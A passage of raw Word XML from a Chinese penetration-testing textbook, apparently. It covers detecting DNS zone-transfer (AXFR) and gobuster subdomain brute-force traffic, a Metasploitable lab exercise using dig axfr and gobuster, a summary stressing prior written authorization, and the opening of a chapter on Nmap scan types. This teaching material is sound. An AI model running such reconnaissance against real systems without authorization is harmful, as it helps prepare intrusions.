        <w:t xml:space="preserve">的核心特征是单个连接日志（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口）中包含明确的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询类型，特征极其鲜明，一条规则即可捕获。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">活动的核心特征是在短时间内，从单一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">产生海量的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录查询，并伴随极高比例的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NXDOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应，这是一种行为模式特征，需要基于流量统计（如单位时间查询量、NXDOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">比率）的算法才能有效检测。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试因其信标式的特征更易被单点检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在您的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或更高版本的靶机（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch2）上：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关脚本探测一下靶机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果靶机内建有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务，尝试构造并执行针对靶机域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig axfr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，观察并记录结果，以此验证其是否禁用了区域传送。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编写一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本，使用一个您自定的、包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个常见子域名称的列表（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），对靶机域名进行枚举。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（进阶）使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并选用一个更大的字典（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自带的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，将其内容前缀化）再次进行枚举，比较两次实验在速度和结果上的异同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="小结-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动侦察的边界在于交互与留痕，DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举是其核心组成，其主要技术路径是两条：利用服务器配置疏漏的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和利用协议开放性的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">子域枚举爆破</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送（AXFR）滥用了服务器间同步的信任假设。其防御基线是严格将其限制在受信源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表内。一次“失败”的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求是安全的常态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子域爆破利用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议对不同查询的标准化应答行为（NOERROR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NXDOMAIN）来进行存在性判定。其技术核心在于字典的有效性以及对通配符解析的识别与绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称性在此领域体现为：攻击者的扫描行为在流量层面会不可避免地留下统计学特征，如极高的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NXDOMAIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询比例和查询熵值的异常。防御者可据此构建检测模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拆分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构是纵深防御的关键实践。它通过分离内外部视角，即使外部枚举是完备的，也无法触达内部真实的“皇冠资产”——内部服务与主机的命名和拓扑结构。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有主动侦察活动的合法性，都完全依赖于事前的书面授权。在法律的红线之外，技术本身并无道德属性，但其应用场景定义了其善恶。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="延伸阅读白名单"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4+ (Information Gathering)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用程序安全项目（OWASP）的测试指南中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“信息收集”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一章是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全评估的起点，系统性地阐述了包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在内的主动信息收集方法论和检查清单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia Weidman, 《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：作为渗透测试领域的经典入门教材，Weidman</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的著作以循序渐进的实验方式，引导读者在构建的实验环境中实践从信息收集到漏洞利用的全过程，其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举章节提供了极佳的动手视角。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章（DNS/IP/路由原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：馆藏前作对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身的报文结构、解析流程、记录类型等底层原理有详尽的原理级阐述。任何对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的理解，都必须建立在对这些协议基础知识的扎实掌握之上。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="95" w:name="端口扫描与服务识别nmap-深讲"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描与服务识别:Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">深讲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="93" w:name="扫描机理tcp-连接syn-半开与-udp-扫描"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描机理:TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接、SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在正式进入端口扫描的攻防机理前，有必要先回视网络侦察的全局位置。第四章已建立被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与主动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举的基线，确认目标网络与存活资产后，攻击者的下一步必然转向“这些主机上哪些端口在监听、运行何种服务”。端口扫描正是主动侦察阶段最核心的环节，也是防御方感知攻击者意图的第一道可见窗口。本节将从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈的底层行为出发，系统化地剖析三种经典扫描技术的机理——TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全连接扫描、SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描——并揭示它们在隐蔽性、可靠性与适用场景上的根本分歧。所有讨论均建立在读者已掌握</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与三次握手的基础上，相关内容已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章详述，此处只面向扫描判定逻辑进行升级式应用。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">前置依赖框</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">本节直接依赖《从位到物联》下列章节的原理铺垫：</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ch27（TCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">状态机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">三次握手</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / RST / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">FIN）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：端口扫描的“敲门—回应”逻辑完全扎根于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> TCP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">状态转换规则，阅读本章前需确认已理解</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN、SYN-ACK、RST、FIN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等标志位的语义及连接终止流程。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ch26（IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / ICMP / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">端口不可达）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
